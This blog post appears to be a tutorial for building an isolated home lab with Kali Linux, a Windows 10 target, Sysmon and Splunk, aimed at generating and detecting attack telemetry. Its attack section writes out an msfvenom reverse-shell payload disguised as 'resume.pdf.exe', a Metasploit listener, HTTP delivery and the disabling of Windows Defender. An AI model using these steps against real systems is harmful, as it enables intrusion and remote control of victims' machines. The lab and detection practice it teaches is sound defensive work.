Building and Attacking a Home Lab: Kali Linux, Windows, and Splunk for Telemetry

Image by clousecasia

Introduction

In this guide, we’ll walk you through setting up a home lab for cybersecurity learning and testing purposes. We’ll use Kali Linux for penetration testing, Windows for the target machine, Procmon for monitoring processes, and Splunk for log analysis.

Prerequisites

• Basic knowledge of networking and operating systems
• A computer with virtualization software (e.g., VMware, VirtualBox)
• Internet connection

Step 1: Setting Up the Virtual Environment

Installing VirtualBox

1. Download and install VirtualBox.
2. Download the VirtualBox Extension Pack and install it.
   Creating Virtual Machines

Setting Up Kali Linux VM

1. Download Kali Linux Pre-Built VMs:

• Visit the Kali Linux Downloads page.
• Download the VirtualBox 64-bit image (or 32-bit if applicable to your system).

2. Extract and Open in VirtualBox:

• Use WinRAR or 7-Zip to extract the downloaded file if it’s in a compressed format.
• Navigate to the extracted folder and double-click the .vbox file to open it in VirtualBox. This will import the VM automatically.

3. Start the VM:

• Open VirtualBox and start the Kali Linux VM.
• Log in using the default credentials: Username: kali, Password: kali.

Windows 10 VM:

1. Open another tab in your browser and search for “Windows 10 ISO Microsoft.”
2. Click on the first link and navigate to the download page.
3. Scroll down and click the “Download tool now” button.
4. Download the Media Creation Tool and run it.
5. Follow the prompts to create a Windows 10 ISO file.
6. Save the ISO file to a location on your computer.

Create VM in VirtualBox:

• Name: Windows 10
• Type: Microsoft Windows, Version: Windows 10 (64-bit)
• Allocate resources (e.g., 4 GB RAM, 1 CPU, 50 GB disk space).

Install Windows 10:

• Load ISO, skip product key for trial, choose Windows 10 Pro, and follow installation steps.

Sysmon Setup:

Install & Configure sysmon in Windows 10 using this article.

Splunk Enterprise Setup:

Install & Configure Splunk in windows 10 using this article.

Part 2: Configuring Network Settings in Virtual Machines

In this part, we will create an internal network between a Windows VM and a Kali VM, ensuring they are isolated from our host machine.

VirtualBox Configuration

1. Open VirtualBox Settings:

• Launch VirtualBox and select your Windows VM.
• Click on Settings and navigate to the Network section.

2. Set Up Internal Network:

• In the Adapter 1 tab, choose Internal Network from the drop-down menu.
• Name the network (e.g., “MyTestNetwork”).
• Repeat these steps for the Kali VM, ensuring both VMs are connected to the same internal network.

3. Assign Static IPs:

Windows VM:

• Start the Windows VM and open Network and Sharing Center.

• Click on Change adapter settings, right-click Ethernet, and select Properties.

• Select Internet Protocol Version 4 (TCP/IPv4) and click on Properties.

• Choose Use the following IP address and set it to something like:
• IP address: 192.168.20.10
• Subnet mask: 255.255.255.0
• Click OK to apply settings.

• Check the new IP using ipconfig command.

Kali VM:

• Start the Kali VM and right click on ethernet icon.

• Click on edit connections.

• Click on gear icon after selecting Wired connection 1 under Ethernet.

• Select Manual method under IPv4 Settings.

• Add a custom ipv4 address and netmask, then save it.

• Run a “ifconfig” command in terminal to check the new IP address.

4. Verify Connectivity:

• From the Windows VM, open Command Prompt and ping the Kali VM: ping 192.168.20.11.

• You will not be able to ping windows machine from Kali because windows firewall block inbound icmp connection.

Part 3: Attacking and Generating Telemetry in Your Home Lab

Preparing Kali Machine:

• Note the IP address of your kali machine using ifconfig or ip a.

Scanning with Nmap:

• Use nmap -A -Pn <Windows IP> to scan the Windows machine.
• Identify open ports (e.g., RDP port 3389).

Creating Malware with MSFVenom:

• Use msfvenom to create a reverse TCP shell payload.
• Command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Kali IP> LPORT=4444 -f exe -o resume.pdf.exe.

Setting Up a Listener with Metasploit:

• Open Metasploit using msfconsole command and use the multi-handler.

• Configure the payload to match the created malware and useoptions command to set other parameters.

• Start the handler to listen for incoming connections.

Serving Malware via HTTP:

• Use Python to set up a simple HTTP server: python3 -m http.server 9999.

• Ensure the Windows machine can download the malware from the Kali machine.

Executing Malware on Windows Machine:

• Disable Windows Defender on the Windows machine.
• Download and run the malware.

• Verify the reverse shell connection with netstat -anob.

Handling the Reverse Shell on Kali:

• Confirm the connection in Metasploit.

• Execute commands (net user, net localgroup, ipconfig) to generate telemetry.

Configuring Splunk:

• Ensure Splunk is ingesting Sysmon logs by configuring inputs.conf under Program Files\Splunk\etc\system\local\inputs.conf

• If you do not see inputs file in local folder , then you may have to copy it from Program Files\Splunk\etc\system\default\inputs.conf
• Restart Splunk services and create an index called endpoint.

• To create an endpoint open splunk > go to settings > indexes > New Index > Create ‘Endpoint’ Index > save.

Analyzing Telemetry in Splunk:

• Use the Splunk search and reporting app to query index=endpoint.

• You can install additional apps to add more fields such as parent_process_execfor filtering logs.

• Filter and analyze logs related to the generated telemetry.

Conclusion:

This article demonstrates how to generate telemetry from attacks to better understand and detect malicious activities. Continue to explore and experiment in your lab to enhance your skills.

If you have any issues or questions, let me know in the comments below.

Credits:

This article is based on the instructional video by MyDFIR youtube channel.